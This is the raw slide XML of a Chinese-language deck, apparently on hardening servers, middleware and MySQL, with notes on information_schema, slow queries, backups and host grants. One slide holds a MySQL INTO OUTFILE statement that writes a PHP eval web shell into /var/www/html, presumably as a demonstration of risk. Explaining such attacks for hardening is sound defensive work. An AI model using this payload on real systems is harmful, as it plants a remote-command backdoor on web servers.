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0"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="484" r:id="rId3"/>
    <p:sldId id="262" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="453" r:id="rId6"/>
    <p:sldId id="461" r:id="rId7"/>
    <p:sldId id="479" r:id="rId8"/>
    <p:sldId id="480" r:id="rId9"/>
    <p:sldId id="452" r:id="rId10"/>
    <p:sldId id="463" r:id="rId11"/>
    <p:sldId id="465" r:id="rId12"/>
    <p:sldId id="464" r:id="rId13"/>
    <p:sldId id="466" r:id="rId14"/>
    <p:sldId id="455" r:id="rId15"/>
    <p:sldId id="456" r:id="rId16"/>
    <p:sldId id="485" r:id="rId17"/>
    <p:sldId id="467" r:id="rId18"/>
    <p:sldId id="468" r:id="rId19"/>
    <p:sldId id="469" r:id="rId20"/>
    <p:sldId id="470" r:id="rId21"/>
    <p:sldId id="471" r:id="rId22"/>
    <p:sldId id="483" r:id="rId23"/>
    <p:sldId id="478" r:id="rId24"/>
    <p:sldId id="472" r:id="rId25"/>
    <p:sldId id="486" r:id="rId26"/>
    <p:sldId id="481" r:id="rId27"/>
    <p:sldId id="482" r:id="rId28"/>
    <p:sldId id="47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2BB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46506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effectLst/>
              </a:rPr>
              <a:t>select '&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>($_POST[1111])?&gt;' into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> '/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/www/html/7.php';</a:t>
            </a:r>
            <a:endParaRPr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慢查询导致服务器卡死</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err="1">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8946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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>简介</a:t>
            </a:r>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直接备份会因版本等问题出现问题，不建议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1207978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9110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information_schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281517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68493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注意：这里</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有的版本不包括本地，以前碰到过给某个用户设置了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>允许任何地方登录，但是在本地登录不了，这个和版本有关系，遇到这个问题再加一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的用户就可以了。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" dirty="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等腰三角形 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2980267" y="2390775"/>
            <a:ext cx="5414433" cy="3502025"/>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等腰三角形 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1905000" y="3095625"/>
            <a:ext cx="463551" cy="2984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等腰三角形 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2123017" y="3768725"/>
            <a:ext cx="2984500" cy="1930400"/>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等腰三角形 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4464051" y="5767388"/>
            <a:ext cx="446617" cy="3238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等腰三角形 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5869517" y="4254500"/>
            <a:ext cx="461433" cy="2984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等腰三角形 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2823633" y="4191000"/>
            <a:ext cx="1581151" cy="1084263"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="516D8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等腰三角形 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9044306">
            <a:off x="7448551" y="4824413"/>
            <a:ext cx="463551" cy="30003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等腰三角形 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9044306">
            <a:off x="8614833" y="4395788"/>
            <a:ext cx="184151" cy="11906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等腰三角形 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9044306">
            <a:off x="9368367" y="4700588"/>
            <a:ext cx="184151" cy="11906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等腰三角形 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4836188">
            <a:off x="10839451" y="357663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等腰三角形 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4836188">
            <a:off x="9491133" y="377348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等腰三角形 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4836188">
            <a:off x="10153651" y="394493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等腰三角形 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1754717" y="2017713"/>
            <a:ext cx="5416551" cy="3502025"/>
          </a:xfrm>
          <a:prstGeom prst="triangl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9247" name="组合 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9118600" y="0"/>
            <a:ext cx="3075517" cy="2447925"/>
            <a:chOff x="6440898" y="0"/>
            <a:chExt cx="2704943" cy="2870458"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="任意多边形 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6440898" y="0"/>
              <a:ext cx="2544429" cy="2193473"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 2544429 w 2544429"/>
                <a:gd name="connsiteY0" fmla="*/ 2193473 h 2193473"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 2544429"/>
                <a:gd name="connsiteY1" fmla="*/ 2193473 h 2193473"/>
                <a:gd name="connsiteX2" fmla="*/ 1272214 w 2544429"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 2193473"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2544429" h="2193473">
                  <a:moveTo>
                    <a:pt x="2544429" y="2193473"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2193473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1272214"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任意多边形 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="7333795" y="160102"/>
              <a:ext cx="1812046" cy="2165347"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1812046 w 1812046"/>
                <a:gd name="connsiteY0" fmla="*/ 2165347 h 2165347"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 1812046"/>
                <a:gd name="connsiteY1" fmla="*/ 2165347 h 2165347"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 1812046"/>
                <a:gd name="connsiteY2" fmla="*/ 958870 h 2165347"/>
                <a:gd name="connsiteX3" fmla="*/ 556145 w 1812046"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 2165347"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1812046" h="2165347">
                  <a:moveTo>
                    <a:pt x="1812046" y="2165347"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2165347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="958870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556145"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等腰三角形 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="7713113" y="361214"/>
              <a:ext cx="1416663" cy="1221261"/>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等腰三角形 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="7129905" y="1622814"/>
              <a:ext cx="661965" cy="57065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等腰三角形 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="8787411" y="2042579"/>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等腰三角形 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="8079712" y="26717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等腰三角形 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="8034643" y="2160108"/>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等腰三角形 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="8310211" y="2292405"/>
              <a:ext cx="401359" cy="34599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等腰三角形 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6767216" y="114342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9232" name="KSO_BT1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2777067" y="2079625"/>
            <a:ext cx="3403600" cy="1317625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr sz="2800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9233" name="KSO_BC1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3115733" y="3451225"/>
            <a:ext cx="2578100" cy="720725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" lvl="2" indent="-914400" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" lvl="3" indent="-1371600" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" lvl="4" indent="-1828800" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版副标题样式</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lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>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199"/>
            <a:ext cx="7994651" cy="1235075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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4050892" y="3400425"/>
            <a:ext cx="4090217"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0"/>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2" y="1244600"/>
            <a:ext cx="5094116" cy="4932363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第二级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5"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6431845" y="2200274"/>
            <a:ext cx="5183188" cy="3684588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第二级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89" y="533402"/>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8"/>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89"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6"/>
            <a:ext cx="617220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1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>单击图标添加图片</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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89"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1" y="365125"/>
            <a:ext cx="7933269" cy="5811838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第二级</a:t>
            </a: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7492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7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9692217" y="0"/>
            <a:ext cx="2501900" cy="1990725"/>
            <a:chOff x="6440898" y="0"/>
            <a:chExt cx="2704943" cy="2870458"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="任意多边形 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6440898" y="0"/>
              <a:ext cx="2544429" cy="2193473"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 2544429 w 2544429"/>
                <a:gd name="connsiteY0" fmla="*/ 2193473 h 2193473"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 2544429"/>
                <a:gd name="connsiteY1" fmla="*/ 2193473 h 2193473"/>
                <a:gd name="connsiteX2" fmla="*/ 1272214 w 2544429"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 2193473"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2544429" h="2193473">
                  <a:moveTo>
                    <a:pt x="2544429" y="2193473"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2193473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1272214"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10800000">
              <a:off x="7333795" y="160102"/>
              <a:ext cx="1812046" cy="2165347"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1812046 w 1812046"/>
                <a:gd name="connsiteY0" fmla="*/ 2165347 h 2165347"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 1812046"/>
                <a:gd name="connsiteY1" fmla="*/ 2165347 h 2165347"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 1812046"/>
                <a:gd name="connsiteY2" fmla="*/ 958870 h 2165347"/>
                <a:gd name="connsiteX3" fmla="*/ 556145 w 1812046"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 2165347"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1812046" h="2165347">
                  <a:moveTo>
                    <a:pt x="1812046" y="2165347"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2165347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="958870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556145"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等腰三角形 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="7713113" y="361214"/>
              <a:ext cx="1416663" cy="1221261"/>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等腰三角形 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="7129905" y="1622814"/>
              <a:ext cx="661965" cy="57065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等腰三角形 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="8787411" y="2042579"/>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等腰三角形 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="8079712" y="26717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等腰三角形 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="8034643" y="2160108"/>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等腰三角形 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="8310211" y="2292405"/>
              <a:ext cx="401359" cy="34599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0800000">
              <a:off x="6767216" y="114342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1031" name="KSO_BT1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="169863"/>
            <a:ext cx="9290051" cy="795337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="x-none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1032" name="KSO_BC1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="1416050"/>
            <a:ext cx="10795000" cy="4794250"/>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3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
        <a:buChar char=""/>
        <a:defRPr lang="zh-CN" altLang="en-US" sz="24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
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1510982" y="0"/>
            <a:ext cx="3493770" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2BBB99"/>
          </a:solid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endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3075" name="椭圆 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4740258" y="867885"/>
            <a:ext cx="575945" cy="52641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3079" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2690495" y="247650"/>
            <a:ext cx="1739900" cy="106172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6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2BBB99"/>
              </a:solidFill>
              <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3080" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6184265" y="867885"/>
            <a:ext cx="3938905" cy="53784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sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>加固</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3081" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6283077" y="2732637"/>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2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中间件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>加固</a:t>
            </a:r>
          </a:p>
